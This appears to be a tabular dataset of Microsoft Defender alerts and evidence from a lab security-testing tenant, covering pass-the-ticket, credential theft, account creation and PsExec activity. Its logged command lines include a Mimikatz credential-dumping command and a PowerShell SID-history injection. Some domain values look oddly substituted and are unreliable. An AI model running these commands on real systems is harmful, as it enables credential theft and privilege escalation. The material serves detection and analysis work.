alertId
stringclasses
278 values
providerAlertId
stringclasses
278 values
incidentId
int64
486
989
serviceSource
stringclasses
2 values
creationTime
stringdate
2022-09-30 05:04:51
2023-01-24 06:03:50
lastUpdatedTime
stringdate
2022-11-12 01:35:42
2023-01-24 06:05:47
resolvedTime
stringclasses
23 values
firstActivity
stringdate
2022-09-07 09:25:00
2023-01-24 05:31:07
lastActivity
stringdate
2022-09-30 05:00:00
2023-01-24 05:43:53
title
stringclasses
62 values
description
stringclasses
51 values
category
stringclasses
12 values
status
stringclasses
2 values
severity
stringclasses
4 values
investigationId
int64
20
64
investigationState
stringclasses
9 values
classification
stringclasses
1 value
determination
stringclasses
1 value
detectionSource
stringclasses
7 values
detectorId
stringclasses
48 values
assignedTo
stringclasses
3 values
actorName
stringclasses
1 value
threatFamilyName
stringclasses
6 values
mitreTechniques
listlengths
0
8
devices
listlengths
1
6
entities
listlengths
0
49
entityType
stringclasses
2 values
evidenceCreationTime
stringclasses
469 values
verdict
stringclasses
5 values
remediationStatus
stringclasses
2 values
accountName
stringclasses
30 values
domainName
stringclasses
17 values
userSid
stringclasses
22 values
aadUserId
stringclasses
8 values
userPrincipalName
stringclasses
14 values
sha1
stringclasses
28 values
sha256
stringclasses
27 values
fileName
stringclasses
21 values
filePath
stringclasses
13 values
processId
int64
0
20.7k
processCommandLine
stringclasses
67 values
processCreationTime
stringclasses
133 values
parentProcessId
int64
0
14.6k
parentProcessCreationTime
stringclasses
63 values
parentProcessFileName
stringclasses
14 values
parentProcessFilePath
stringclasses
11 values
detectionStatus
stringclasses
1 value
deviceId
stringclasses
9 values
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-12T13:47:46.4766667Z
Suspicious
None
root
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-09-30T06:20:01.6733333Z
Suspicious
Active
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
2,596
copy con test.txt
2022-09-30T06:11:52.7127433Z
4,064
2022-09-30T06:11:13.210308Z
powershell.exe
\Device\HarddiskVolume4\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-22T08:51:30.1466667Z
Suspicious
None
root
MSDXV8
S-1-5-18
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
aa0b733089-4ba9-428a-ac84-50ecf57ff647
0b733089-4ba9-428a-ac84-50ecf57ff647
765
MicrosoftDefenderForIdentity
2022-11-21T04:13:22.6244685Z
2022-11-26T01:38:23.5333333Z
2022-11-26T01:35:43.0633333Z
2022-11-21T01:58:51.222711Z
2022-11-21T02:33:50.093383Z
Suspected identity theft (pass-the-ticket)
An actor took Steve Lewis (IT director)'s Kerberos ticket from MSDXV2-Win10B and used it on MSDXV2-Win10V to access 3 resources.
LateralMovement
Resolved
High
null
UnsupportedAlertType
TruePositive
SecurityTesting
AzureATP
PassTheTicketSecurityAlert
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1550", "T1550.003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "NotSupported", "deviceDnsName": "rnd.local", "firstSeen": "2022-08-08T08:27:58.906Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96", "onboardingStatus": "Onboarded", "osBuild"...
[ { "aadUserId": null, "accountName": "krbtgt", "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "User", "evidenceCreationTime": "2022-11-21T04:13:22.6633333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": n...
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T13:47:35.73Z
Malicious
None
darol
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638045930199785518_-1077336413
40b5c7bb-6b12-48ac-8955-75d8315f5afa
765
MicrosoftDefenderForEndpoint
2022-11-21T02:03:39.9785874Z
2022-11-21T03:45:17.6166667Z
2022-11-21T03:45:17.4759763Z
2022-11-21T02:01:37.421151Z
2022-11-21T02:01:45.2773414Z
Multiple dual-purpose tools were dropped
Multiple known public tools, which could also be used for malicious reasons were dropped on this device. Attackers might download or copy multiple dual-purpose tools to the target device to perform various attack stages including, credential theft, privilege escalation, and lateral movement.
LateralMovement
Resolved
High
50
SuccessfullyRemediated
null
null
WindowsDefenderAtp
e0e0ea40-b5ca-4cbf-8380-24119951f847
null
null
null
[ "T1003", "T1021", "T1105", "T1555", "T1558.003", "T1570" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDev...
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-21T02:03:40.5733333Z", "fileName": null, "filePath": null, "ipAddre...
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T17:09:16.3333333Z
Unknown
None
darol
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638037515968051731_-1966537717
6aa0bf88-81a9-4352-afab-6f829898ad85
686
MicrosoftDefenderForEndpoint
2022-11-11T08:19:56.8051952Z
2022-11-12T01:35:43.1766667Z
2022-11-12T01:35:42.84Z
2022-11-11T08:17:58.3607509Z
2022-11-11T08:17:58.3607509Z
Suspicious account creation
A new user account was created. A new user account can be created to establish a secondary of backup access to the device or services within the organization. An attacker might be attempting to maintain access to the device or organization.
Persistence
Resolved
Medium
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
b0c31f72-1d80-458a-8ceb-5bc7bbcbd30a
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1136", "T1136.001" ]
[ { "aadDeviceId": null, "defenderAvStatus": "NotSupported", "deviceDnsName": "msdxv2-dc.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:27:58.906Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "Defender", "domainName": "MSDXV2" } ], "mda...
[ { "aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09", "accountName": "steve", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-11T08:19:56.9466667Z", "fileName": null, "filePath": null, "ipAddr...
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638071952904737348_-1257045812
f0b84ff9-f7d0-47cc-ba04-04d7fa9263d3
970
MicrosoftDefenderForEndpoint
2022-12-21T04:54:50.4737476Z
2022-12-21T04:58:53.4333333Z
null
2022-12-21T04:51:35.2938513Z
2022-12-21T04:51:35.2938513Z
Connection to a custom network indicator
An endpoint has connected to a URL or domain in your list of custom indicators.
CommandAndControl
New
Informational
null
UnsupportedAlertType
null
null
CustomerTI
08dfd06f-d2e2-4049-899f-67b406311d84
null
null
null
[]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv8-win10b.msdxv8.m365dpoc.com", "firstSeen": "2022-12-08T01:04:21.9057174Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "steve", "domainName": "MSDXV8" } ], "mda...
[ { "aadUserId": null, "accountName": "steve", "detectionStatus": null, "deviceId": null, "domainName": "MSDXV8", "entityType": "User", "evidenceCreationTime": "2022-12-21T04:54:50.71Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": nul...
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-21T02:04:34.8433333Z
Suspicious
Active
operator
NT AUTHORITY
S-1-5-18
null
null
f309b61a8b005b5ce0a3fb58caaa798cfc95f5db
3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748
PSEXESVC.exe
C:\Windows
7,692
PSEXESVC.exe
2022-11-21T02:02:06.2012631Z
620
2022-11-16T03:32:19.0279725Z
services.exe
C:\Windows\System32
Detected
36150b3c1b69b5c2da9df4efd86ac6c166924a48
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-18T05:10:52.3466667Z
Suspicious
None
jeff
lab.net
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-12T09:13:17.21Z
Suspicious
None
darol
prod.env
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-22T08:48:24.7866667Z
Malicious
None
jeff
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1104
null
jeff@msdxv8.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-21T02:11:45.81Z
Suspicious
Active
steve
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1107
0808dea1-2ec8-41d2-8e3e-7c18309fab09
steve@msdxv2.m365dpoc.com
6cbce4a295c163791b60fc23d285e6d84f28ee4c
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
2,504
copy con test.txt
2022-11-21T02:07:28.5026314Z
3,020
2022-11-21T02:07:15.6313121Z
cmd.exe
C:\Windows\System32
Detected
e138ecd8e7b21eaf952cb35d56349bf50c64ac96
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-12-22T08:48:24.5566667Z
Suspicious
None
user1
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1104
null
jeff@msdxv8.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
7,772
"mimikatz.exe" privilege::debug sekurlsa::logonpasswords exit
2022-12-22T08:47:23.3350389Z
6,324
2022-12-22T08:47:11.8139068Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
7ba8aa008687dd62d639cb45b52c7c9f971c65c1
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-16T08:31:10.5066667Z
Suspicious
None
alice
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1109
34a6a005-fc93-42dc-ae87-352d3e9921c4
jesse@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-18T05:13:00.6633333Z
Suspicious
None
jeff
malicious.io
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-11T08:19:41.68Z
Suspicious
Active
analyst
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1107
0808dea1-2ec8-41d2-8e3e-7c18309fab09
steve@msdxv2.m365dpoc.com
6cbce4a295c163791b60fc23d285e6d84f28ee4c
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
7,044
powershell.exe -Command "Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \"S-1-5-32-544\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters).\"DSA Database file\""
2022-11-11T08:18:11.105891Z
6,240
2022-11-11T08:17:58.2692455Z
cmd.exe
C:\Windows\System32
Detected
e138ecd8e7b21eaf952cb35d56349bf50c64ac96
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-18T05:12:05.72Z
Malicious
Active
SYSTEM
NT AUTHORITY
S-1-5-18
null
null
f309b61a8b005b5ce0a3fb58caaa798cfc95f5db
3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748
PSEXESVC.exe
C:\Windows
8,284
PSEXESVC.exe
2022-11-18T05:10:14.6889142Z
620
2022-11-16T03:32:19.0279725Z
services.exe
C:\Windows\System32
Detected
36150b3c1b69b5c2da9df4efd86ac6c166924a48
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-12-22T08:58:22.4333333Z
Suspicious
None
ronhd
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1111
null
ronhd@msdxv8.m365dpoc.com
fc870d086c53ded2e94300f7569aa9478186f2c7
a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1
Rubeus.exe
C:\Temp
2,536
copy con test.txt
2022-12-22T08:47:51.8048258Z
5,228
2022-12-22T08:47:51.6930217Z
cmd.exe
C:\Windows\System32
Detected
4f111b3b2366eacdcc66d7ad73548fff9b039c15
da638043450326836199_-712324832
3d94af3b-32d4-4606-9ee1-299138c18e8f
741
MicrosoftDefenderForEndpoint
2022-11-18T05:10:32.6836422Z
2022-11-19T01:35:46.6533333Z
2022-11-19T01:35:46.5533333Z
2022-11-18T05:09:25.2290062Z
2022-11-18T05:13:25.7938668Z
Anomalous account lookups
An anomalous chain of attempts to look up user account information has been observed. An attacker might be gathering information about potential targets.
Discovery
Resolved
Low
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
ad0494b0-6cfa-4ba2-9285-706fd414acd8
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1033", "T1069.001", "T1069.002", "T1087", "T1087.001", "T1087.002" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDev...
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-18T05:10:32.76Z", "fileName": null, "filePath": null, "ipAddress": ...
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:03:39.97Z
Suspicious
None
jeff
prod.env
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
aa0b733089-4ba9-428a-ac84-50ecf57ff647
0b733089-4ba9-428a-ac84-50ecf57ff647
765
MicrosoftDefenderForIdentity
2022-11-21T04:13:22.6244685Z
2022-11-26T01:38:23.5333333Z
2022-11-26T01:35:43.0633333Z
2022-11-21T01:58:51.222711Z
2022-11-21T02:33:50.093383Z
Suspected identity theft (pass-the-ticket)
An actor took Steve Lewis (IT director)'s Kerberos ticket from MSDXV2-Win10B and used it on MSDXV2-Win10V to access 3 resources.
LateralMovement
Resolved
High
null
UnsupportedAlertType
TruePositive
SecurityTesting
AzureATP
PassTheTicketSecurityAlert
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1550", "T1550.003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "NotSupported", "deviceDnsName": "rnd.local", "firstSeen": "2022-08-08T08:27:58.906Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96", "onboardingStatus": "Onboarded", "osBuild"...
[ { "aadUserId": null, "accountName": "krbtgt", "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "User", "evidenceCreationTime": "2022-11-21T04:13:22.6633333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": n...
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-09-30T06:14:52.89Z
Suspicious
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
6cbce4a295c163791b60fc23d285e6d84f28ee4c
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
4,064
"powershell.exe"
2022-09-30T06:11:13.210308Z
null
null
null
null
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-21T02:05:47.3Z
Suspicious
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
9,780
cmd.exe /c whoami
2022-11-21T02:02:27.1310359Z
11,068
2022-11-21T02:01:28.4753286Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
da638045930249254436_-241984083
6178cdf4-3eee-4a5d-bb91-6984adeefb2d
765
MicrosoftDefenderForEndpoint
2022-11-21T02:03:44.9254621Z
2022-11-21T02:47:46.7766667Z
null
2022-11-21T02:01:36.9984727Z
2022-11-21T02:33:54.0400057Z
Suspicious User Account Discovery
A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks.
Discovery
New
Low
null
UnsupportedAlertType
null
null
WindowsDefenderAtp
9bfe28a9-21eb-4f8a-b51e-38ebd3650c88
null
null
null
[ "T1033", "T1087", "T1087.001" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "rnd.local", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534...
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-21T02:03:45.04Z", "fileName": null, "filePath": null, "ipAddress": ...
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-09-30T05:19:15.88Z
Suspicious
None
darol
malicious.io
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638072958615996658_-1059094230
0028052d-9e47-487e-bfb2-b3c8e42aa452
975
MicrosoftDefenderForEndpoint
2022-12-22T08:51:01.5996851Z
2022-12-22T09:30:38.2066667Z
null
2022-12-22T08:47:23.1319863Z
2022-12-22T09:24:55.5977806Z
Suspicious User Account Discovery
A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks.
Discovery
New
Low
null
UnsupportedAlertType
null
null
WindowsDefenderAtp
9bfe28a9-21eb-4f8a-b51e-38ebd3650c88
null
null
null
[ "T1033", "T1087", "T1087.001" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "rnd.local", "firstSeen": "2022-12-08T05:21:19.944Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV8" } ], "mdatpDeviceId": "7ba8aa008687dd6...
[ { "aadUserId": null, "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "MSDXV8", "entityType": "User", "evidenceCreationTime": "2022-12-22T08:51:01.6233333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime":...
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638072963592774141_-165641504
2bb9ed0d-f18e-46c1-a2e9-72b2a1f7758a
975
MicrosoftDefenderForEndpoint
2022-12-22T08:59:19.2774369Z
2022-12-22T08:59:19.8966667Z
null
2022-12-22T08:47:53.1304775Z
2022-12-22T08:47:53.1304775Z
Malicious credential theft tool execution detected
A known credential theft tool execution command line was detected. Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
CredentialAccess
New
High
null
UnsupportedAlertType
null
null
WindowsDefenderAtp
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
null
null
null
[ "T1003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "staging.net", "firstSeen": "2022-12-08T05:21:19.944Z", "healthStatus": "Inactive", "loggedOnUsers": [], "mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1", "onboardingStatus": "Onboarded", "osBuild":...
[ { "aadUserId": null, "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "MSDXV8", "entityType": "User", "evidenceCreationTime": "2022-12-22T08:59:19.3466667Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime":...
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-11T08:19:19.8366667Z
Suspicious
None
analyst
NT AUTHORITY
S-1-5-18
null
null
f309b61a8b005b5ce0a3fb58caaa798cfc95f5db
3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748
PSEXESVC.exe
C:\Windows
3,844
PSEXESVC.exe
2022-11-11T08:17:34.3184356Z
632
2022-11-11T08:13:27.8223756Z
services.exe
C:\Windows\System32
Detected
36150b3c1b69b5c2da9df4efd86ac6c166924a48
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T08:42:21.7333333Z
Suspicious
None
user1
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638037515790235232_1824808798
10261bd8-7812-4b0f-b88e-a03f9c715d41
686
MicrosoftDefenderForEndpoint
2022-11-11T08:19:39.0235417Z
2022-11-12T01:35:43.1766667Z
2022-11-12T01:35:42.84Z
2022-11-11T08:17:34.3613292Z
2022-11-11T08:17:34.3613292Z
Suspicious service launched
A suspicious service was started on this device. Attackers might use services to launch malicious commands or programs. This technique is used to maintain persistence or elevate privileges on the target device.
Execution
Resolved
Medium
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
a5af9713-6eea-4d23-9bdc-9cab19f19092
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1569.002" ]
[ { "aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600", "defenderAvStatus": "Updated", "deviceDnsName": "evilcorp.cn", "firstSeen": "2022-08-08T08:29:47.252Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "onboardingStat...
[ { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-11T08:19:39.07Z", "fileName": "PSEXESVC.exe", "filePath": "...
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T16:44:32.9466667Z
Suspicious
None
darol
corp.local
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-21T02:03:41.55Z
Suspicious
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
6cbce4a295c163791b60fc23d285e6d84f28ee4c
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
11,068
copy con test.txt
2022-11-21T02:01:28.4753286Z
4,680
2022-11-10T07:07:26.0872385Z
explorer.exe
C:\Windows
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:05:51.15Z
Suspicious
None
jeff
malicious.io
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-22T08:59:19.2433333Z
Suspicious
None
jeff
internal.corp
S-1-5-21-2159906967-4174806019-1002223092-1104
null
jeff@msdxv8.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-09-30T06:14:52.89Z
Suspicious
None
root
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-09-30T06:15:59.7633333Z
Suspicious
Active
steve
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1107
0808dea1-2ec8-41d2-8e3e-7c18309fab09
steve@msdxv2.m365dpoc.com
ded8fd7f36417f66eb6ada10e0c0d7c0022986e9
bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527
cmd.exe
C:\Windows\System32
3,132
ping 127.0.0.1
2022-09-30T06:13:29.1932614Z
7,308
2022-09-30T06:13:28.5321636Z
PSEXESVC.exe
C:\Windows
Detected
e138ecd8e7b21eaf952cb35d56349bf50c64ac96
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-22T08:59:27.94Z
Suspicious
None
jeff
evilcorp.cn
S-1-5-21-2159906967-4174806019-1002223092-1104
null
jeff@msdxv8.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-12T09:22:24.0766667Z
Malicious
None
darol
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-21T02:17:48.44Z
Suspicious
None
user1
null
S-1-5-21-2300221942-1987151257-321556088-1104
null
null
